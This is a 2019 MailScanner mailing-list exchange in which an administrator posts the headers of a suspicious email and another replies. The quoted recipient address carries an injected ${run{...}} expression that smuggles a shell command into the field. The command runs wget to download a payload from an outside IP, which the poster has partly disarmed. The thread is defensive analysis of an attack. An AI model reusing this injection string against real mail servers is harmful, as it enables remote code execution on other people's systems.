possible attack against MailScanner ?
Shawn Iverson
iversons at rushville.k12.in.us
Mon Jul 15 11:15:09 UTC 2019
Is that the start of a cron script in the email address field?
If so, you need to fix that.
On Mon, Jul 15, 2019 at 6:59 AM Heino Backhaus <
heino.backhaus at fink-computer.de> wrote:
> Hallo List,
>
> i need some help analysing the following email, i received last week.
>
> Mailwatch Mail-Metadata:
>
> Received: from sab.com (unknown [46.22.132.94])
> by mailscanner.mydomain.local (Postfix) with SMTP id D3F551005AD
> for <root+${run{x2fbinx2fsht-ctx22wgetx20*1.2.3.4*x2fsbzx2f*5.6.7.8*
> x22}}@mailscanner.mydomain.local>; Thu, 11 Jul 2019 19:34:58 +0200 (CEST)
> Received: 1
> Received: 2
> Received: 3
> Received: 4
> Received: 5
> Received: 6
> Received: 7
> Received: 8
> Received: 9
> Received: 10
> Received: 11
> Received: 12
> Received: 13
> Received: 14
> Received: 15
> Received: 16
> Received: 17
> Received: 18
> Received: 19
> Received: 20
> Received: 21
> Received: 22
> Received: 23
> Received: 24
> Received: 25
> Received: 26
> Received: 27
> Received: 28
> Received: 29
> Received: 30
> Received: 31
>
>
>
> IP1: *199.204.214.40* changed to *1.2.3.4* to disarm this...just in
> case...
> IP2: *87.138.227.107* changed to *5.6.7.8* to disarm this...just in
> case...
>
> Versions:
> MailWatch Version: 1.2.9
> OS: Ubuntu 16.04.6 LTS (Xenial Xerus)
> Postfix Version: 3.1.0
> MailScanner Version: 5.1.2
> ClamAV Version: 0.102.0-devel-20190715
> SpamAssassin Version: 3.4.2
> PHP Version: 5.6.40-8+ubuntu16.04.1+deb.sury.org+1
> MySQL Version: 5.7.26-0ubuntu0.16.04.1
>
> Can you help me to bring some light in this dark...
>
> --
> Mit freundlichen Gruessen
>
> H. Backhaus
>
> Fink-Computer Systeme
> Heggrabenstr. 9, 35435 Wettenberg
> Email: heino.backhaus at fink-computer.de
> Web: www.fink-computer.de
> Fax: +49-641-98444638
> Fon: +49-641-98444640
> UST-ID: DE151040770
> HRB: 2143 Gießen
> GF: Fredi Fink
>
> I was gratified to be able to answer promptly, and I did.
> I said I didn't know.
> Mark Twain
>
>
> --
> Diese E-Mail wurde auf Viren und gefährliche Anhänge
> durch *MailScanner* <http://www.mailscanner.info/> untersucht und ist
> wahrscheinlich virenfrei.
>
>
> --
> MailScanner mailing list
> mailscanner at lists.mailscanner.info
> http://lists.mailscanner.info/mailman/listinfo/mailscanner
>
>
--
Shawn Iverson, CETL
Director of Technology
Rush County Schools
765-932-3901 option 7
iversons at rushville.k12.in.us
[image: Cybersecurity]
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.mailscanner.info/pipermail/mailscanner/attachments/20190715/59455178/attachment.html>
More information about the MailScanner
mailing list